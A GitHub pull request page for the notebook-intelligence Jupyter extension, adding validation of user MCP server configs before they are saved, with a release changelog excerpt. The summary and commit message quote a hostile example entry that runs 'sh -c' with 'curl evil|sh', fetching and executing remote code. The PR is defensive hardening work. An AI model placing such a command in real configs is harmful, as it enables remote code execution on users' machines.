security(mcp): validate user MCP config shape before persisting by pjdoland · Pull Request #299 · plmbr/notebook-intelligence

pjdoland · 2026-05-18T03:44:14Z

Summary

MCPConfigFileHandler.post accepted any JSON body, assigned it verbatim to user_mcp, persisted to disk, and called update_mcp_servers. There was no shape validation, so:

{mcpServers: null} crashed the loader on the next reload with AttributeError.
{mcpServers: {evil: {command: 'sh', args: ['-c', 'curl evil|sh']}}} installed a destructive stdio server that fired on the next session start.

The previous failure path silently returned HTTP 200 with the exception message in the body, so the client had no way to tell the save had failed.

Solution

New module notebook_intelligence/mcp_config_validation.py exports validate_mcp_config(data) (raises MCPConfigValidationError). The handler now returns:

HTTP 400 with the validator's message on bad shape.
HTTP 400 with the parser error on invalid JSON.
HTTP 500 with the exception on downstream save / reconcile failure.

ai_service_manager.nbi_config.user_mcp is mutated only after the validator passes; the disk write and update_mcp_servers never run on rejected payloads.

Validator coverage:

Top-level keys constrained to mcpServers and participants.
Each mcpServers[name] entry must be an object with exactly one of command or url, unless disabled: true (which lets a user park an entry by stripping the command, matching the loader's skip-on-disabled behavior).
command and url must be non-empty strings (the empty-url check restores symmetry with the existing empty-command rule).
args and autoApprove must be lists of strings; env and headers must be string-to-string maps; disabled must be a bool; type must be one of {stdio, sse, http} AND consistent with the command/url presence. A type='stdio' with a url, or a type='http' with a command, is now rejected loudly instead of being silently dropped by the loader.
Unknown per-server keys are rejected so a typo like commnd does not silently leave the entry inert.

Frontend: NBIMCPConfigDocument._onSave in src/index.ts now catches the rejection and surfaces it via Notification.error. Without this, the document model went clean on save and the user had no signal that their edit did not persist.

Testing

tests/test_mcp_config_validation.py: 38 unit cases on the validator (empty/degenerate, top-level keys, server-entry rules including the disabled-parking allowance, motivating exploit shapes), and four dispatch-level cases driving the real MCPConfigFileHandler via AsyncHTTPTestCase (rejected payload returns 400, no side effects; valid payload returns 200 and writes through to a mocked ai_service_manager).
Full suites: pytest 802 pass, tsc clean, prettier clean, jest 178 pass.

Risks / follow-ups

Behavior change: existing ~/.jupyter/nbi/mcp.json files on disk are unaffected because the validator runs only on POST. If an existing file already contains a shape the validator now rejects (mcpServers: null, unknown keys), the user will see the rejection the first time they edit and save through the Settings UI. The loader is unchanged, so existing files that load today continue to load.
Validate-on-read not addressed: a mcpServers: null written before this PR still crashes the loader at session start. A future PR could lift the validator into the read path with per-entry try/except and drop-with-warning semantics.
XSRF is a separate concern: this handler is still @tornado.web.authenticated without an _xsrf check. The validator is defense in depth; the cross-site forgery surface is tracked as a separate audit item.
Read-after-write integration: the validator is consistent with the MCPManager.create_mcp_server loader contract verified by code-cross-reference, but there is no end-to-end POST→GET round-trip test. The handler-mock test pins that nbi_config.save is called with the validated payload; an integration round-trip would belong in a separate AsyncHTTPTestCase that wires the full stack.

MCPConfigFileHandler.post took the request body, assigned it verbatim to user_mcp, saved to disk, and called update_mcp_servers. There was no schema validation: 'mcpServers: null' crashed the loader on next reload, and an adversarial '{mcpServers: {evil: {command: "sh", args: ["-c", "curl evil|sh"]}}}' installed a destructive server. The previous exception path silently returned 200 with the message in the body so the client could not even tell the save had been rejected. Add notebook_intelligence/mcp_config_validation.py exporting validate_mcp_config and MCPConfigValidationError. The handler now returns 400 with the validator's message on both invalid JSON and bad shape, 500 on downstream save / reconcile failure, and writes through to disk only after validation passes. The validator covers: - Top-level keys constrained to mcpServers and participants. - mcpServers entries must be objects, with exactly one of command or url unless 'disabled' is true (parking a server with no command is allowed since the loader skips disabled entries before reading either field). - command / url must be non-empty strings. The explicit empty-url check matches the existing empty-command rule for symmetry. - args, autoApprove must be lists of strings; env, headers must be string-to-string maps; disabled must be bool; type must be one of {stdio, sse, http} AND consistent with the command/url presence (type='stdio' with a url, or type='http' with a command, are now rejected loudly instead of silently dropped by the loader). - Unknown server-entry keys are rejected so a typo like 'commnd' isn't silently ignored. Frontend: NBIMCPConfigDocument._onSave now catches the rejection and surfaces it via Notification.error. Without this, the document model went clean on save and the user had no signal that their edit didn't actually persist.

Promotes the [Unreleased] CHANGELOG snapshot to [5.0.0] - 2026-05-22 and expands it to cover everything merged into upstream/main after PR plmbr#287's docs refresh. Bumps package.json to 5.0.0. CHANGELOG additions cover the post-plmbr#287 surface: - Settings tabs: plugin marketplace picker (plmbr#284), plugin marketplace details + Update button (plmbr#303), per-workspace MCP disable (plmbr#286), JSON-paste path in Add MCP server (plmbr#285). - Launchers: hide-with-policy (plmbr#288), brand icons for Codex / opencode (plmbr#325, plmbr#333), per-launch directory picker (plmbr#332). - Chat sidebar and agentic UX: workspace @-mention in Claude mode (plmbr#327), reload-open-files-on-disk (plmbr#330), steered system prompt away from over-eager notebook creation (plmbr#336). - Skills: multi-manifest support (plmbr#321), tracks-upstream for user- imported skills (plmbr#322), HTTP kill switch for the reconciler (plmbr#291). - Accessibility: full sub-section covering plmbr#305-plmbr#320. - Security: shell-tool sandbox (plmbr#290), Claude UI-bridge sandbox (plmbr#323), 0o600 on encrypted token (plmbr#293), env-secret scrubbing (plmbr#295), MCP config shape validation (plmbr#299), XSS allowlist (plmbr#296), Copilot WS auth + origin (plmbr#301), GHE host detection (plmbr#292), fastmcp -> mcp SDK swap (plmbr#324). - Fixed: session listing unification (plmbr#310), session preview unwrap (plmbr#331), down-area runtime throw (plmbr#330 follow-up), WS message-handler leak (plmbr#294). - Removed: fastmcp dependency, history.jsonl session gate. Adds a Migration note covering the five behavior changes operators should review before upgrading from 4.x: fastmcp swap, path sandboxes, history.jsonl gate removal, workspace @-mention pointer shape, and the Copilot WebSocket auth/origin tightening. Two reviewer rounds (six personas each) applied: - Round 1 caught security overclaims (plmbr#293, plmbr#299, plmbr#323), the plmbr#284/plmbr#303 mis-attribution, missing migration note, 3 em dashes, and the stale `fastmcp==2.x.*` recommendation in the admin guide. - Round 2 caught the missing plmbr#301 migration bullet, missing version- matrix 5.0.x row, missing README TOC entry, and a couple of style nits (sub-heading overpromise, orphan bullet). Skipped (deferred to future PRs): - README first-run tour mention. - Admin guide HTTP kill-switch row in Failure-modes table. - Terminal drag-drop trust-model precision update after plmbr#327. - Cipher description nit in plmbr#293 (Fernet AES-128-CBC+HMAC, not AES-GCM).

mbektas approved these changes May 18, 2026

View reviewed changes

pjdoland added the bug Something isn't working label May 18, 2026

pjdoland changed the title ~~fix(mcp): validate user MCP config shape before persisting~~ security(mcp): validate user MCP config shape before persisting May 18, 2026

mbektas merged commit 2ff7f00 into plmbr:main May 18, 2026
5 of 6 checks passed

pjdoland mentioned this pull request May 22, 2026

chore(release): prep 5.0.0 docs and version bump #338

Merged

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

security(mcp): validate user MCP config shape before persisting#299

security(mcp): validate user MCP config shape before persisting#299
mbektas merged 1 commit into
plmbr:mainfrom
pjdoland:fix/validate-mcp-config-json

pjdoland commented May 18, 2026

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

pjdoland commented May 18, 2026

Summary

Solution

Testing

Risks / follow-ups

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants